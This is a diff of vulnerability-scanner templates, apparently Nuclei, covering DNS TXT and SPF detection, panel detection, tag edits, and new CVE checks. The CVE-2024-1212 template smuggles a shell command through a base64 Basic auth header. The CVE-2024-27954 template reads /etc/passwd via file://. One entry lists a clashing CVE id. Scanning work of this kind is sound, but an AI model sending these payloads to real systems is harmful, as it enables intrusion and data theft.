name: "google-cloud-platform"
|
||||
words:
|
||||
- "googledomains.com"
|
||||
- "google.com"
|
||||
|
||||
- type: word
|
||||
name: "alibaba"
|
||||
words:
|
||||
- "alibabadns.com"
|
||||
|
||||
- type: word
|
||||
name: "safeway"
|
||||
words:
|
||||
- "safeway.com"
|
||||
|
||||
- type: word
|
||||
name: "mark-monitor"
|
||||
words:
|
||||
- "markmonitor.com"
|
||||
- "markmonitor.zone"
|
||||
|
||||
- type: word
|
||||
name: "hetznet"
|
||||
words:
|
||||
- "hetzner.com"
|
||||
|
||||
- type: word
|
||||
name: "edge-cast"
|
||||
words:
|
||||
- "edgecastdns.net"
|
||||
# digest: 4a0a00473045022052cc795314a697081c68e82277bf2be22ff53410f9a9a69af759ecefcd5b235b022100f94a899ec64709bb1f7d4e648dc091ee40029b754e4cc451882f0ccb68ff4921:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,25 @@
|
|||
id: spf-record-detect
|
||||
|
||||
info:
|
||||
name: SPF Record - Detection
|
||||
author: rxerium
|
||||
severity: info
|
||||
description: |
|
||||
An SPF TXT record was detected
|
||||
reference:
|
||||
- https://www.mimecast.com/content/how-to-create-an-spf-txt-record
|
||||
tags: dns,spf
|
||||
|
||||
dns:
|
||||
- name: "{{FQDN}}"
|
||||
type: TXT
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "v=spf1"
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
regex:
|
||||
- "v=spf1(.+)"
|
||||
# digest: 4b0a00483046022100ada13ee531e36c1b45b196bafc39386d03ee223d98f9d0c3d3bd6f0609c6101202210099f776bb4a582a65c321385adc3d8fa9ec6f3047e658c38c6da98c89dd82c7c9:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,221 @@
|
|||
id: txt-service-detect
|
||||
|
||||
info:
|
||||
name: DNS TXT Service - Detect
|
||||
author: rxerium
|
||||
severity: info
|
||||
description: |
|
||||
Finding the services companies use via their TXT records.
|
||||
reference:
|
||||
- https://www.abenezer.ca/blog/services-companies-use-txt-records
|
||||
metadata:
|
||||
max-request: 1
|
||||
verified: true
|
||||
tags: dns,txt
|
||||
|
||||
dns:
|
||||
- name: "{{FQDN}}"
|
||||
type: TXT
|
||||
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: word
|
||||
name: "keybase"
|
||||
words:
|
||||
- "keybase-site-verification"
|
||||
|
||||
- type: word
|
||||
name: "proton-mail"
|
||||
words:
|
||||
- "protonmail-verification"
|
||||
|
||||
- type: word
|
||||
name: "webex"
|
||||
words:
|
||||
- "webexdomainverification"
|
||||
|
||||
- type: word
|
||||
name: "apple"
|
||||
words:
|
||||
- "apple-domain-verification"
|
||||
|
||||
- type: word
|
||||
name: "facebook"
|
||||
words:
|
||||
- "facebook-domain-verification"
|
||||
|
||||
- type: word
|
||||
name: "autodesk"
|
||||
words:
|
||||
- "autodesk-domain-verification"
|
||||
|
||||
- type: word
|
||||
name: "stripe"
|
||||
words:
|
||||
- "stripe-verification"
|
||||
|
||||
- type: word
|
||||
name: "atlassian"
|
||||
words:
|
||||
- "atlassian-domain-verification"
|
||||
|
||||
- type: word
|
||||
name: "adobe-sign"
|
||||
words:
|
||||
- "adobe-sign-verification"
|
||||
|
||||
- type: word
|
||||
name: "zoho"
|
||||
words:
|
||||
- "zoho-verification"
|
||||
|
||||
- type: word
|
||||
name: "have-i-been-pwned"
|
||||
words:
|
||||
- "have-i-been-pwned-verification"
|
||||
|
||||
- type: word
|
||||
name: "knowbe4"
|
||||
words:
|
||||
- "knowbe4-site-verification"
|
||||
|
||||
- type: word
|
||||
name: "jamf"
|
||||
words:
|
||||
- "jamf-site-verification"
|
||||
|
||||
- type: word
|
||||
name: "parallels"
|
||||
words:
|
||||
- "parallels-domain-verification"
|
||||
|
||||
- type: word
|
||||
name: "dropbox"
|
||||
words:
|
||||
- "dropbox-domain-verification"
|
||||
|
||||
- type: word
|
||||
name: "vmware-cloud"
|
||||
words:
|
||||
- "vmware-cloud-verification"
|
||||
|
||||
- type: word
|
||||
name: "canva"
|
||||
words:
|
||||
- "canva-site-verification"
|
||||
|
||||
- type: word
|
||||
name: "mongodb"
|
||||
words:
|
||||
- "mongodb-site-verification"
|
||||
|
||||
- type: word
|
||||
name: "slack"
|
||||
words:
|
||||
- "slack-domain-verification"
|
||||
|
||||
- type: word
|
||||
name: "teamViewer"
|
||||
words:
|
||||
- "teamviewer-sso-verification"
|
||||
|
||||
- type: word
|
||||
name: "bugcrowd"
|
||||
words:
|
||||
- "bugcrowd-verification"
|
||||
|
||||
- type: word
|
||||
name: "cisco"
|
||||
words:
|
||||
- "cisco-site-verification"
|
||||
|
||||
- type: word
|
||||
name: "palo-alto-networks"
|
||||
words:
|
||||
- "paloaltonetworks-site-verification"
|
||||
|
||||
- type: word
|
||||
name: "twilio"
|
||||
words:
|
||||
- "twilio-domain-verification"
|
||||
|
||||
- type: word
|
||||
name: "dell-technologies"
|
||||
words:
|
||||
- "dell-technologies-domain-verification"
|
||||
|
||||
- type: word
|
||||
name: "1password"
|
||||
words:
|
||||
- "1password-site-verification"
|
||||
|
||||
- type: word
|
||||
name: "duo"
|
||||
words:
|
||||
- "duo_sso_verification"
|
||||
|
||||
- type: word
|
||||
name: "sophos"
|
||||
words:
|
||||
- "sophos-domain-verification"
|
||||
|
||||
- type: word
|
||||
name: "pinterest"
|
||||
words:
|
||||
- "pinterest-site-verification"
|
||||
|
||||
- type: word
|
||||
name: "citrix"
|
||||
words:
|
||||
- "citrix-verification-code"
|
||||
|
||||
- type: word
|
||||
name: "zapier"
|
||||
words:
|
||||
- "zapier-domain-verification-challenge"
|
||||
|
||||
- type: word
|
||||
name: "uber"
|
||||
words:
|
||||
- "uber-domain-verification"
|
||||
|
||||
- type: word
|
||||
name: "zoom"
|
||||
words:
|
||||
- "zoom-domain-verification"
|
||||
|
||||
- type: word
|
||||
name: "lastpass"
|
||||
words:
|
||||
- "lastpass-verification-code"
|
||||
|
||||
- type: word
|
||||
name: "google-workspace"
|
||||
words:
|
||||
- "google-site-verification"
|
||||
|
||||
- type: word
|
||||
name: "flexera"
|
||||
words:
|
||||
- "flexera-domain-verification"
|
||||
|
||||
- type: word
|
||||
name: "yandex"
|
||||
words:
|
||||
- "yandex-verification"
|
||||
|
||||
- type: word
|
||||
name: "calendly"
|
||||
words:
|
||||
- "calendly-site-verification"
|
||||
|
||||
- type: word
|
||||
name: "docusign"
|
||||
words:
|
||||
- "docusign"
|
||||
|
||||
- type: word
|
||||
name: "whimsical"
|
||||
words:
|
||||
- "whimsical"
|
||||
# digest: 490a00463044022043132b95ad11ec72665418855d60e0d979abbe9957b18f9170981f4f4af22a72022054d2942e7554851cd1f043f99d5e119ff9e8943a635a891927b1897d270383b9:922c64590222798bb761d5b6d8e72950
|
|
@ -27,7 +27,7 @@ info:
|
|||
max-request: 1
|
||||
vendor: mysqldumper
|
||||
product: mysqldumper
|
||||
tags: cve2012,cve,packetstorm,lfi,edb,mysqldumper,xss
|
||||
tags: cve2012,cve,packetstorm,lfi,edb,mysqldumper
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
|
@ -43,4 +43,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4b0a00483046022100eefa80b385734b0a1e6f33288900b62b779941de6560c529987c9593f998d354022100a78e22cf092547bdbd7693f37f2f5fe8f9d4858b98c6fcfc32c3cf37b6f96274:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100de6cb5ae696eb8f0b8837ff02b5e53e8049e806e0253c9933027f7da28634071022100fc1518b608713661374a7f1ebd5ef01b8816925196928a73aa3882adf5bf8192:922c64590222798bb761d5b6d8e72950
|
|
@ -28,7 +28,7 @@ info:
|
|||
max-request: 65
|
||||
vendor: embedthis
|
||||
product: goahead
|
||||
tags: cve,cve2017,rce,goahead,bruteforce,kev,vulhub,embedthis
|
||||
tags: cve,cve2017,rce,goahead,fuzz,kev,vulhub,embedthis
|
||||
|
||||
http:
|
||||
- raw:
|
||||
|
@ -117,4 +117,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a00473045022100dec8b43170cf34ed98fbf83c8dc09389ffefda9fd823a123f509f32dbb63cc570220638e59f0bec3b3ab5a49d51408722e58ca5276e415dfaa2cb4821b2c65b295ac:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a004630440220121da3e7b07d35d6cc36396744f512a33ad3dc1ba36b7f99975e68d99f7950e50220073fc66cac1e0ba2aba9a53106e851591967dd64abdeb8b4d199284261e0417d:922c64590222798bb761d5b6d8e72950
|
|
@ -27,7 +27,7 @@ info:
|
|||
max-request: 100
|
||||
vendor: zabbix
|
||||
product: zabbix
|
||||
tags: cve2019,cve,bruteforce,auth-bypass,login,edb,zabbix
|
||||
tags: cve2019,cve,fuzz,auth-bypass,login,edb,zabbix
|
||||
|
||||
http:
|
||||
- raw:
|
||||
|
@ -48,4 +48,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 490a004630440220626b2ab1255806a015af4a5a877b4cc26870eaa35262c5980d85b262263b2bad022029a7a7154e81df1a32ffc290eadfb2dfe71fd5c7dc9fbadbf4bc92c421ea6a48:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a0046304402206e060526ed498e58aeb165e1a86c6dfb0f822270df28b1f37de9879abeb9453502205623412e5aa23b5444d28233dc3a09dd053b5d8c1d4138adc4bd5cf524207012:922c64590222798bb761d5b6d8e72950
|
|
@ -28,7 +28,7 @@ info:
|
|||
vendor: automattic
|
||||
product: sensei_lms
|
||||
framework: wordpress
|
||||
tags: cve,cve2022,wp,disclosure,wpscan,sensei-lms,bruteforce,hackerone,wordpress,wp-plugin,automattic
|
||||
tags: cve,cve2022,wp,disclosure,wpscan,sensei-lms,fuzz,hackerone,wordpress,wp-plugin,automattic
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
|
@ -56,4 +56,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 490a0046304402207c51a21553085f96246b9b7a7b8fcb17455c8ede92140fc56ac74b94c60b3fcf022054295c2dbda0cd3975caa9c8ac89cd1d99b8f237e8fe3258e096d29e53f99f61:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a004630440220495ab4eeb68248ce94758f27eab64434c32477db41d51efff29e248a0bee54a102204decc78a0d04e9931c1440579656391f3cd9c5e45d86f0b672c44c99bc942d72:922c64590222798bb761d5b6d8e72950
|
|
@ -29,7 +29,7 @@ info:
|
|||
vendor: anti-malware_security_and_brute-force_firewall_project
|
||||
product: anti-malware_security_and_brute-force_firewall
|
||||
framework: wordpress
|
||||
tags: cve,cve2022,wordpress,wp-plugin,xss,gotmls,authenticated,wpscan,anti-malware_security_and_brute-force_firewall_project
|
||||
tags: cve,cve2022,wordpress,wp-plugin,xss,gotmls,authenticated,wpscan
|
||||
|
||||
http:
|
||||
- raw:
|
||||
|
@ -60,4 +60,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a00473045022100eef0f765c6118556853d7fbe2dacb78f2e80b4b820d56e883878df1688544eb402205baf46c82ff1df66387173dd365185b8a1517ac070ededd1288d324488f2b15a:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022059cd96c86ae45ea4aa0ae09c6c3740e9225be1edfbafa84a38473cad7830094d022100e1627acd2f09e5f64cb1285bd45bad4f3b7d95657dff74b6310bbcfdcf01c8c5:922c64590222798bb761d5b6d8e72950
|
|
@ -28,7 +28,7 @@ info:
|
|||
vendor: citrix
|
||||
product: sharefile_storage_zones_controller
|
||||
shodan-query: title:"ShareFile Storage Server"
|
||||
tags: cve2023,cve,sharefile,rce,intrusive,fileupload,bruteforce,kev,citrix
|
||||
tags: cve2023,cve,sharefile,rce,intrusive,fileupload,fuzz,kev,citrix
|
||||
variables:
|
||||
fileName: '{{rand_base(8)}}'
|
||||
|
||||
|
@ -60,4 +60,4 @@ http:
|
|||
- type: dsl
|
||||
dsl:
|
||||
- 'BaseURL+ "/cifs/" + fileName + ".aspx"'
|
||||
# digest: 4a0a00473045022100d934886760e9ccd26b8fc8bb22de25e8dd46427d5b1b2c0773a84cba9646446002206093910f6613687b25b29229ba4f688d9a5721012f2691c8079cdcc61a203332:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a0046304402205da7cab8d8af553734b5f1c9203e90944a89fecdb12b73130bd97a508abf49bb022024325216beeb52a5e651a6cc678fc4dfa622158a1a0535f6464bb780be2f111a:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,47 @@
|
|||
id: CVE-2024-1212
|
||||
|
||||
info:
|
||||
name: Progress Kemp LoadMaster - Command Injection
|
||||
author: DhiyaneshDK
|
||||
severity: critical
|
||||
description: |
|
||||
Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution.
|
||||
reference:
|
||||
- https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster
|
||||
- https://support.kemptechnologies.com/hc/en-us/articles/23878931058445-LoadMaster-Security-Vulnerability-CVE-2024-1212
|
||||
- https://support.kemptechnologies.com/hc/en-us/articles/24325072850573-Release-Notice-LMOS-7-2-59-2-7-2-54-8-7-2-48-10-CVE-2024-1212
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2024-1212
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 10
|
||||
cve-id: CVE-2024-1212
|
||||
cwe-id: CWE-78
|
||||
epss-score: 0.00046
|
||||
epss-percentile: 0.13478
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
shodan-query: html:"LoadMaster"
|
||||
tags: cve,cve2024,progress,rce,loadmaster
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/access/set?param=enableapi&value=1"
|
||||
headers:
|
||||
Authorization: "Basic JztsczsnOmRvZXNub3RtYXR0ZXI="
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "bin"
|
||||
- "mnt"
|
||||
- "WWW-Authenticate: Basic"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a004730450220557f3f2f5ab7b8e23925a9acc4979743940842b4936843aaae68876e24ed24a4022100f067f077e0dae8b1aa1264efb248349fdd7e6f95341ca06cbab9c183402f4e99:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,38 @@
|
|||
id: CVE-2024-27954
|
||||
|
||||
info:
|
||||
name: WordPress Automatic Plugin <3.92.1 - Arbitrary File Download and SSRF
|
||||
author: iamnoooob,rootxharsh,pdresearch
|
||||
severity: critical
|
||||
description: |
|
||||
WordPress Automatic plugin <3.92.1 is vulnerable to unauthenticated Arbitrary File Download and SSRF Located in the downloader.php file, could permit attackers to download any file from a site. Sensitive data, including login credentials and backup files, could fall into the wrong hands. This vulnerability has been patched in version 3.92.1.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/53b97401-1352-477b-a69a-680b01ef7266/
|
||||
- https://securityonline.info/40000-sites-exposed-wordpress-plugin-update-critical-cve-2024-27956-cve-2024-27954/#google_vignette
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27954
|
||||
classification:
|
||||
cvss-score: 9.8
|
||||
cwe-id: CWE-918
|
||||
cve-id: CVE-2022-1970
|
||||
metadata:
|
||||
max-request: 1
|
||||
verified: true
|
||||
publicwww-query: "/wp-content/plugins/wp-automatic"
|
||||
tags: cve,cve2024,wp,wordpress,wp-plugin,lfi,ssrf,wp-automatic
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/?p=3232&wp_automatic=download&link=file:///etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"link":"file:'
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
# digest: 4a0a00473045022100fe0fefeeca090cd190ad427541a138e93717d0eac2f27c00a2eec4bf5a63e30902202c2a3213ac5e28f8244ed547d1dd868bc948638e4cddaacee81de6d2f9422da1:922c64590222798bb761d5b6d8e72950
|
|
@ -13,7 +13,7 @@ info:
|
|||
cwe-id: CWE-522
|
||||
metadata:
|
||||
max-request: 1
|
||||
tags: alibaba,default-login
|
||||
tags: canal,alibaba,default-login
|
||||
|
||||
http:
|
||||
- raw:
|
||||
|
@ -42,5 +42,4 @@ http:
|
|||
words:
|
||||
- 'data":{"token"'
|
||||
- '"code":20000'
|
||||
|
||||
# digest: 4a0a004730450220126d880af62775003a5b6029ad39aead9272e2a61bdaab710e896acf665d7064022100caa03f9b85633bd64fce0925f23720ac678e539c93355165426ed68a982d820e:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100dcf09580a68dde8267efb45c71a519054938eaa0f8389934c19a69f945ecbd73022010071bf196c1b070ee79de3c48c4227e6834381e641b486b2059ace96d8257d7:922c64590222798bb761d5b6d8e72950
|
|
@ -16,7 +16,7 @@ info:
|
|||
verified: true
|
||||
max-request: 200
|
||||
shodan-query: title:"Oracle PeopleSoft Sign-in"
|
||||
tags: default-login,peoplesoft,oracle,bruteforce
|
||||
tags: default-login,peoplesoft,oracle,fuzz
|
||||
|
||||
http:
|
||||
- method: POST
|
||||
|
@ -82,4 +82,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 302
|
||||
# digest: 490a00463044022050a7ba41878e766a7453e20f034e337465bb2c7e07eda9ce12ec916ed28df2d202205e97d0b986bb626f7127189fc4f889109ba9f20801a5a72cc406f9e6dcf5db4e:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a00463044022021caed0d7676a38577b2c3d3b6a6549f5bcb9942d4b96265587f639ae486006502203ec6b9e3cce73f65f0aaffe2ae6ea2835d44c5431bd579f08d3fe2450ccedb74:922c64590222798bb761d5b6d8e72950
|
|
@ -19,7 +19,7 @@ info:
|
|||
vendor: adminer
|
||||
product: adminer
|
||||
max-request: 741
|
||||
tags: panel,bruteforce,adminer,login,sqli
|
||||
tags: panel,fuzz,adminer,login,sqli
|
||||
|
||||
http:
|
||||
- raw:
|
||||
|
@ -53,4 +53,4 @@ http:
|
|||
group: 1
|
||||
regex:
|
||||
- '<span class="version">([0-9.]+)'
|
||||
# digest: 4a0a00473045022100ee20baf11aa5604db68aa1754dd077e912192bd19c3e3586c7442a697f6ac22102204c689729457b6f71c285dfe1309b72f23ba46b69516e80c2baaad9b20bd4b77a:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100d1fcc4e636bdb5f3961f4541594d60ac0dc86688a2cda52de2530fbf4ca9b770022100d68508fb2d73378f62f821365ccc2f11f063da2ae73ded7792159a9a1c97e373:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,29 @@
|
|||
id: softether-vpn-panel
|
||||
|
||||
info:
|
||||
name: SoftEther VPN Panel - Detect
|
||||
author: bhutch
|
||||
severity: info
|
||||
description: |
|
||||
SoftEther VPN panel was detected.
|
||||
metadata:
|
||||
max-request: 1
|
||||
verified: true
|
||||
shodan-query: http.title:"SoftEther VPN Server"
|
||||
tags: panel,vpn,softether
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<title>SoftEther VPN Server</title>"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 202
|
|
@ -7,7 +7,7 @@ info:
|
|||
description: PHP Source File is disclosed to external users.
|
||||
metadata:
|
||||
max-request: 1512
|
||||
tags: exposure,backup,php,disclosure,bruteforce
|
||||
tags: exposure,backup,php,disclosure,fuzz
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
|
@ -136,4 +136,4 @@ http:
|
|||
- "text/plain"
|
||||
- "bytes"
|
||||
condition: or
|
||||
# digest: 4b0a00483046022100c733de0ef40feb46f3e0d6ba5996c622340ad6910a6ea85e9c1c4e8aa1939cd2022100b73afbe7b608bdd57d018fe31bdc23a620f2e6b965916193232c840782ef90d0:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022019ff7dd3ceced23dec05a238feaf346674305dde6a4a6613b965cf8d0500acfc02210092bbcbb84d7180e46714712507b6e6b108317250bc01d99b3d8eee50b2d7f393:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,155 @@
|
|||
id: generic-db
|
||||
|
||||
info:
|
||||
name: Generic Database File - Exposure
|
||||
author: Michal Mikolas (nanuqcz)
|
||||
severity: high
|
||||
description: |
|
||||
This is collection of some web frameworks recommendation or default configuration for SQLite database file location. If this file is publicly accessible due to server misconfiguration, it could result in application data leak including users sensitive data, password hashes etc.
|
||||
reference:
|
||||
- https://laravel.com/docs/11.x/database#sqlite-configuration # database/database.sqlite
|
||||
- https://laravel.com/docs/5.2/database # database/database.sqlite
|
||||
- https://github.com/laracasts/larabook/blob/master/app/config/database.php#L51 # app/database/production.sqlite
|
||||
- https://forum.codeigniter.com/post-389846.html # writable/db.sqlite3
|
||||
- https://github.com/codeigniter4projects/playground/blob/develop/.env.example#L33 # writable/database.db
|
||||
- https://symfony.com/doc/current/doctrine.html#configuring-the-database # var/app.db
|
||||
- https://symfony.com/doc/4.x/doctrine.html#configuring-the-database # var/app.db
|
||||
- https://symfony.com/doc/3.x/doctrine.html # app/sqlite.db
|
||||
- https://symfony.com/doc/2.x/doctrine.html # sqlite.db
|
||||
- https://openclassrooms.com/forum/sujet/symfony3-sqlite-could-not-create-database # var/data/db.sqlite
|
||||
- https://symfony.com/doc/current/reference/configuration/doctrine.html#doctrine-dbal-configuration # var/data/data.sqlite
|
||||
- https://stackoverflow.com/questions/31762878/sqlite-3-database-with-django # db.sqlite3
|
||||
- https://medium.com/@codewithbushra/using-sqlite-as-a-database-backend-in-django-projects-code-with-bushra-d23e3100686e # db.sqlite3
|
||||
- https://gist.github.com/jwo/4512764?permalink_comment_id=2235763#gistcomment-2235763 # db/production.sqlite3
|
||||
- https://stackoverflow.com/a/30345819/1632572 # db/production.sqlite3
|
||||
- https://developerhowto.com/2018/12/29/build-a-rest-api-with-node-js-and-express-js/ # db.sqlite
|
||||
- https://sqldocs.org/sqlite/sqlite-nodejs/ # mydb.sqlite
|
||||
- https://stackoverflow.com/questions/41620788/error-database-connection-sqlite-is-missing-or-could-not-be-created-cakephp # app/data/app_db.sqlite
|
||||
- https://stackoverflow.com/questions/2722383/using-sqlite3-with-cakephp # app/webroot/database.sqlite, app/database.sqlite
|
||||
- https://levelup.gitconnected.com/how-to-connect-and-use-the-sqlite-database-in-codeigniter-3-48cd50d3e78d # application/databases/db.sqlite
|
||||
- https://turmanauli.medium.com/how-to-connect-codeigniter-to-sqlite3-database-like-a-pro-2177497a6d30 # application/db/database.sqlite
|
||||
- https://forum.codeigniter.com/thread-74522.html # application/Database/db1.db
|
||||
- https://stackoverflow.com/a/37088960/1632572 # application/database/data.db
|
||||
- https://docs.laminas.dev/tutorials/getting-started/database-and-models/ # data/*.db
|
||||
- https://phalcon-nucleon.github.io/#!database/getting-started.html # storage/database/database.sqlite
|
||||
- https://www.yiiframework.com/doc/blog/1.1/en/prototype.database # protected/data/*.db
|
||||
- https://pusher.com/tutorials/rest-api-slim-part-1/ # db/database.db
|
||||
- https://www.digitalocean.com/community/tutorials/how-to-use-the-fat-free-php-framework # db/database.sqlite
|
||||
- https://doc.nette.org/en/database/configuration#toc-single-connection # app/Model/*.db
|
||||
- https://www.sqlite.org/fileformat.html # SQLite file always starts with "SQLite format {sqlite_version}"
|
||||
- https://en.wikipedia.org/wiki/List_of_file_signatures # SQLite binary signature: 53 51 4C 69 74 65 20 66 6F 72 6D 61 74 20
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
metadata:
|
||||
max-request: 89
|
||||
tags: files,database,exposure,sqlite,sqlite3,fuzz
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
|
||||
- "{{BaseURL}}/{{path}}"
|
||||
|
||||
payloads:
|
||||
path:
|
||||
- database/database.sqlite
|
||||
- database/production.db
|
||||
- database/production.sqlite
|
||||
- database/production.sqlite3
|
||||
- app/database/production.sqlite
|
||||
- writable/db.sqlite3
|
||||
- writable/database.db
|
||||
- var/app.db
|
||||
- var/data/db.sqlite
|
||||
- var/data/data.sqlite
|
||||
- app/sqlite.db
|
||||
- sqlite.db
|
||||
- db.sqlite3
|
||||
- db/production.sqlite3
|
||||
- db.sqlite
|
||||
- mydb.sqlite
|
||||
- app/data/app_db.sqlite
|
||||
- app/webroot/database.sqlite
|
||||
- app/database.sqlite
|
||||
- application/databases/db.sqlite
|
||||
- application/db/database.sqlite
|
||||
- application/Database/db1.db
|
||||
- application/database/data.db
|
||||
- data/app.db
|
||||
- data/sqlite.db
|
||||
- data/sqlite3.db
|
||||
- data/database.db
|
||||
- data/production.db
|
||||
- storage/database/database.sqlite
|
||||
- protected/data/app.db
|
||||
- protected/data/sqlite.db
|
||||
- protected/data/sqlite3.db
|
||||
- protected/data/database.db
|
||||
- protected/data/production.db
|
||||
- db/database.db
|
||||
- db/database.sqlite
|
||||
- app/Model/app.db
|
||||
- app/Model/sqlite.db
|
||||
- app/Model/sqlite3.db
|
||||
- app/Model/database.db
|
||||
- app/Model/production.db
|
||||
- app.db
|
||||
- sqlite3.db
|
||||
- app.sqlite
|
||||
- app.sqlite3
|
||||
- database.db
|
||||
- database.sqlite
|
||||
- database.sqlite3
|
||||
- production.db
|
||||
- production.sqlite
|
||||
- production.sqlite3
|
||||
- db/db.sqlite
|
||||
- db/db.sqlite3
|
||||
- db/sqlite.db
|
||||
- db/sqlite3.db
|
||||
- db/app.db
|
||||
- db/app.sqlite
|
||||
- db/app.sqlite3
|
||||
- db/database.sqlite3
|
||||
- db/production.db
|
||||
- db/production.sqlite
|
||||
- app/db.sqlite
|
||||
- app/db.sqlite3
|
||||
- app/sqlite3.db
|
||||
- app/app.db
|
||||
- app/app.sqlite
|
||||
- app/app.sqlite3
|
||||
- app/database.db
|
||||
- app/database.sqlite3
|
||||
- app/production.db
|
||||
- app/production.sqlite
|
||||
- app/production.sqlite3
|
||||
- data/db.sqlite
|
||||
- data/db.sqlite3
|
||||
- data/app.sqlite
|
||||
- data/app.sqlite3
|
||||
- data/database.sqlite
|
||||
- data/database.sqlite3
|
||||
- data/production.sqlite
|
||||
- data/production.sqlite3
|
||||
- database/db.sqlite
|
||||
- database/db.sqlite3
|
||||
- database/sqlite.db
|
||||
- database/sqlite3.db
|
||||
- database/app.db
|
||||
- database/app.sqlite
|
||||
- database/app.sqlite3
|
||||
- database/database.db
|
||||
- database/database.sqlite3
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'startswith(body, "SQLite")' # SQLite file always starts with "SQLite format {sqlite_version}"
|
||||
- 'contains(body, "CREATE TABLE")' # SQLite file usually contains "CREATE TABLE", meaning there is at least one table
|
||||
- '!contains(body, "<html")'
|
||||
- 'status_code == 200'
|
||||
condition: and
|
||||
# digest: 4a0a004730450220774c7ea36d2f6f3cb0c04baa3799540d2f306ccd5bd5c0fac8f19330142bac96022100f7919a4722b5363b5e4bffdb1785d7dbf746fe3dd261e089c46f206ac91e7f12:922c64590222798bb761d5b6d8e72950
|
|
@ -34,4 +34,4 @@ http:
|
|||
- 'contains(body_1, "{{randstr}}")'
|
||||
- 'contains(body_2, "{{randstr}}")'
|
||||
condition: and
|
||||
# digest: 4b0a00483046022100bba6a80d36a07519a4f1b8528ccff3881319bdcd199c51e9d78c319e8832cac8022100f86715b3dbd1438e11a557d63175be67feddc557a7e0bbfcfa6c1b764a48aa0d:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100893d371d193cc0f4111cf8b61a2d092bf7820039aa9a6eecf49529c0d59ac41702201b80bdfb4007c9173b4cff9a55590cf605b0918021c8bbd96b3cc0294ecd5124:922c64590222798bb761d5b6d8e72950
|
|
@ -39,4 +39,4 @@ http:
|
|||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
# digest: 4a0a0047304502203dfb9d94713bdd57f01a1037a1a475e92c22c7f2917019840a194b6d93960fe5022100d2d94c46b98286546a9bd02fe1229a1fb36b8d4e40d0dd981d1ad31662ab0a3c:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a00463044022044f5c4ce901be80e947968eba35f25a3f9606a5cd8936480fd0cf89bde3edf4f022041fe2163a6b12dcb07d1e872f3051eb642e9b10dcf52f59d3e5a9a8107cf7434:922c64590222798bb761d5b6d8e72950
|
|
@ -15,7 +15,7 @@ info:
|
|||
cwe-id: CWE-200
|
||||
metadata:
|
||||
max-request: 4
|
||||
tags: bruteforce,edb
|
||||
tags: iis,edb
|
||||
|
||||
http:
|
||||
- raw:
|
||||
|
@ -44,4 +44,4 @@ http:
|
|||
- type: dsl
|
||||
dsl:
|
||||
- "status_code_1!=404 && status_code_2 == 404 || status_code_3 != 404 && status_code_4 == 404"
|
||||
